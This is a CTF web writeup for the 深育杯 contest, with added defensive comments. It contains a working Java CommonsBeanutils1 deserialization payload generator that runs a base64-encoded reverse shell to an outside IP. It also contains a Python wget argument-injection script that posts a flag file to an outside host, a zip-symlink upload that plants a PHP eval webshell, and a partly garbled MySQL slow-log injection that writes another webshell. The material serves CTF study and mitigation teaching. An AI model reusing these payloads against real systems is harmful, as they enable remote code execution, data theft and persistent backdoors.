
深育杯Web Writeup

Posted on 2021-11-13, 4 min read

Web

Java

响应头里有日志路径，从日志中又能看到 jar 目录，直接输入 jar 包路径就拿到了。。。

有个路由存在反序列化，用的是不依赖 cc（commons-collections）的 CommonsBeanutils1 链。

package com.example.demo;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.ClassPool;
import javassist.CtClass;
import org.apache.commons.beanutils.BeanComparator;
import org.apache.tomcat.util.codec.binary.Base64;
import java.io.ByteArrayOutputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.PriorityQueue;
import java.util.Collections;

public class guoke {
    // Payload generator from the writeup: builds a serialized object graph that, when
    // read with ObjectInputStream on the vulnerable route, defines and initialises the
    // author's class (the "CommonsBeanutils1" chain; no commons-collections needed).
    // Kept verbatim for reference. Defender takeaway: the robust fix on the server is
    // to stop Java-native deserialization of untrusted bytes altogether, or at least to
    // install a strict ObjectInputFilter (JEP 290) allow-list so that PriorityQueue /
    // BeanComparator / TemplatesImpl arriving in an untrusted stream are rejected
    // before any readObject runs.

    // Helper: set a (private) field by reflection, so the gadget objects can be
    // populated without going through their constructors or setters.
    public static void setFieldValue(Object object, String fieldName, Object value) throws Exception{
        Field field = object.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);  // bypasses access checks on the declared field
        field.set(object, value);
    }
    // Returns the serialized attack chain as a byte array.
    public static byte[] getPayload() throws Exception {
        // Build the class that TemplatesImpl will later define. It extends
        // AbstractTranslet (presumably because TemplatesImpl insists on that superclass)
        // and all of its work sits in a static initializer, which runs as soon as the
        // class is initialised.
        ClassPool pool = ClassPool.getDefault();
        CtClass payload = pool.makeClass("EvilClass");
        payload.setSuperclass(pool.get("com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet"));
        // Harmless variant the author used to trace the Shiro call chain (prints a stack trace).
        // payload.makeClassInitializer().setBody("new java.io.IOException().printStackTrace();");
        // The static initializer executes a shell command (the base64 argument is the
        // author's command; it is not decoded here). Detection on the host keys on
        // exactly this: the JVM spawning bash/sh as a child process right after a
        // request that hits a deserialization endpoint.
        payload.makeClassInitializer().setBody("java.lang.Runtime.getRuntime().exec(\"bash -c {echo,L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC8xLjE1LjY3LjE0Mi8xMzM3IDA+JjE=}|{base64,-d}|{bash,-i}\");");
        byte[] evilClass = payload.toBytecode();
        // Populate TemplatesImpl by reflection: _bytecodes holds the class to define;
        // _name and _tfactory are set to non-null values so the later property read
        // does not fail early. Reading the "outputProperties" bean property (set further
        // down) is presumably what makes TemplatesImpl define and initialise EvilClass.
        TemplatesImpl templates = new TemplatesImpl();
        setFieldValue(templates, "_bytecodes", new byte[][]{evilClass});
        setFieldValue(templates, "_name", "test");
        setFieldValue(templates,"_tfactory", new TransformerFactoryImpl());
        // Build the object that gets serialized. Change 1: the comparator is passed
        // explicitly (String.CASE_INSENSITIVE_ORDER, a JDK class) instead of relying on
        // BeanComparator's default — presumably this is what removes the
        // commons-collections dependency mentioned in the writeup.
        BeanComparator beanComparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER);  // change 1
        PriorityQueue<Object> queue = new PriorityQueue<Object>(2, beanComparator);
        // Change 2: two placeholder strings are added while property is still null, so
        // the compare PriorityQueue performs on add stays harmless; the real elements
        // and the property name are swapped in afterwards by reflection.
        queue.add("1");  // change 2
        queue.add("1");
        // Rewire the graph: property -> "outputProperties", queue -> the two
        // TemplatesImpl instances. During deserialization PriorityQueue presumably
        // re-orders its elements with the comparator, which reads "outputProperties"
        // on TemplatesImpl, and the class above gets loaded.
        setFieldValue(beanComparator, "property", "outputProperties");
        setFieldValue(queue, "queue", new Object[]{templates, templates});
        // Serialize (the original comment said "deserialize"; this side only writes the stream).
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        ObjectOutputStream out = new ObjectOutputStream(byteArrayOutputStream);
        out.writeObject(queue);
        out.close();  // not try-with-resources; an exception above leaks the stream, but the process exits anyway
        return byteArrayOutputStream.toByteArray();
    }
    // Prints the payload base64-encoded so it can be pasted into the request body.
    public static void main(String[] args) throws Exception {
        byte[] payloads = guoke.getPayload();
        System.out.println(Base64.encodeBase64String(payloads));
    }
}

wget

U1S1，这是去年纵横杯的题，白盒题到这里却只能黑盒做了???

import base64
import re
import requests
from Crypto.Cipher import PKCS1_v1_5 as Cipher_pksc1_v1_5
from Crypto.PublicKey import RSA

def encrpt(password, public_key):
    """Encrypt ``password`` with the PEM-encoded RSA ``public_key``; return base64 text.

    Padding is PKCS#1 v1.5 because that is what the challenge server decrypts
    with. NOTE(review): for anything new prefer RSA-OAEP — v1.5 decryption is the
    classic padding-oracle (Bleichenbacher) target. ``password`` is UTF-8 encoded
    and must fit in a single RSA block; the library raises on over-long input
    rather than chunking it.
    """
    key_obj = RSA.importKey(public_key)
    encryptor = Cipher_pksc1_v1_5.new(key_obj)
    ciphertext = encryptor.encrypt(password.encode())
    return base64.b64encode(ciphertext).decode()

# Value handed to the server's "wget" endpoint. It is not a plain URL: after the
# host it carries a literal backslash-n sequence and a real tab followed by
# "--post-file=flag_is_here", i.e. it presumably relies on the server splitting the
# decrypted value on whitespace and handing the pieces to wget as separate argv
# entries (argument injection). Server-side defence: parse the URL with a real
# parser and accept only scheme/host/path, reject any control or whitespace
# character, and invoke wget with a fixed argv list that ends in "--" so user
# input can never become an option.
url="http://1.15.67.142:1337/\\n?\t--post-file=flag_is_here"
# RSA public key published by the challenge; the endpoint only accepts the URL in
# encrypted form. Encryption of the parameter is not input validation — the
# decrypted value still has to be validated before it reaches a process.
public_key = '-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAoFH2atPqJOH6yezxEw9seStp0j7hN3cKKlANZpAv8RRhpDxFcob47OwkyUlsJp6tdvSJBtsJ5KCNYIomdqc7+f4PJvShHatMLGBRFjUkr0aunqq9LDobEHrzwSEEX6V0V+73EdbieYxFHCz2cXaBMpnIK19c+u6sgVJFjZ+oggVyKuOtOUscnzzrMhOWGl+eXk+dBe0wjSTrq84zvRI194uTehhY/8hzZjkQavV8NWq0b7l6hJHsO7mp2tGye1npYRQ/tZCEMkzO+PaAkPf6H3CyuVgbdMJcuSBJT8kBRQ6P16skZIqrY+NRmdSJmMoGgR9NYVvk8soeSj4MHRpbrwIDAQAB\n-----END PUBLIC KEY-----'
password = encrpt(url, public_key)
# POST the encrypted value; the response is kept in `res` but never printed.
res=(requests.post(url="http://192.168.40.126:1003/wget",data={"encryptdata":password}).text)
# A plain GET of the same endpoint is then used to see what wget did.
print(requests.get("http://192.168.40.126:1003/wget").text)

zipzip

# Step 1: an archive whose entry "guoke" is a symlink to the web root. If the
# upload handler extracts archives with symlinks preserved, the link is
# materialised on the server and anything later written under "guoke/" lands
# in the link's target instead of the upload directory.
ln -s /var/www/html guoke
zip --symlinks guoke.zip guoke
上传guoke.zip
# Step 2: replace the local link with a real directory holding a PHP file and
# archive that; on the server "guoke/guoke.php" is presumably extracted through
# the symlink created in step 1.
rm -rf guoke
mkdir guoke
echo '<?php eval($_POST[1]);?>' > guoke/guoke.php
zip -y guoke1.zip guoke/*
上传guoke1.zip
# Mitigation: refuse archive entries that are symlinks (or extract with a
# library that never creates them), resolve every destination path and require
# it to stay under the extraction directory, and serve uploads from a
# non-executable location.

ezsql

-- Injection fragment from the writeup, left as found ("setglobal" and "elect" look
-- like transcription losses). It closes the original statement, then uses stacked
-- queries to point MySQL's slow query log at a file under the web root, enable the
-- log, and lower long_query_time so the following statement — whose text contains
-- PHP — is written into that file.
1);
set GLOBAL slow_query_log_file='/var/www/html/helpyou2findflag.php';
set GLOBAL slow_query_log=on;
setglobal long_query_time=0.000001;
elect '<?php $_REQUEST[a]($_REQUEST[b])?>';--+
-- Defensive notes: the chain needs stacked queries to be enabled in the client
-- driver, a DB account allowed to run SET GLOBAL (SUPER / SYSTEM_VARIABLES_ADMIN),
-- and a mysqld process that can write into the web root. Parameterised queries, a
-- least-privilege DB account, and a web root not writable by mysqld each break it;
-- the author notes they could not reproduce it.

听说是用慢查询日志 getshell？然而没有复现成功，等 WP 了。
